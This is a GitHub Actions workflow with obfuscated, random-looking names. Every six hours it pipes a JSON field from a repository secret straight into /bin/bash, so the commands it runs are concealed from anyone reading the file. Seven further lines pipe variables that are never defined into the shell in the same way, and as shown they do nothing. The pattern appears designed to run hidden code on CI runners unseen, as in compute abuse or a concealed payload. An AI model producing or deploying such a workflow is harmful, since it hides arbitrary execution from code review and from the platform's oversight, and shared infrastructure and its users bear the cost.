name: lijun19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '17 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lijun19871010
        env:
          zvvs74: ${{ secrets.zvvs74 }}
        run: |
          echo $zvvs74 | jq -r .tbdok3870 | /bin/bash
          echo $ns21880 | jq -r .bdoed1335 | /bin/bash
          echo $udqu586 | jq -r .tcuno4 | /bin/bash
          echo $j321 | jq -r .y778 | /bin/bash
          echo $evug4 | jq -r .mfc03604 | /bin/bash
          echo $ya081 | jq -r .lkukn895 | /bin/bash
          echo $aw05439 | jq -r .rysh4795 | /bin/bash
          echo $mix6 | jq -r .rcixl9650 | /bin/bash

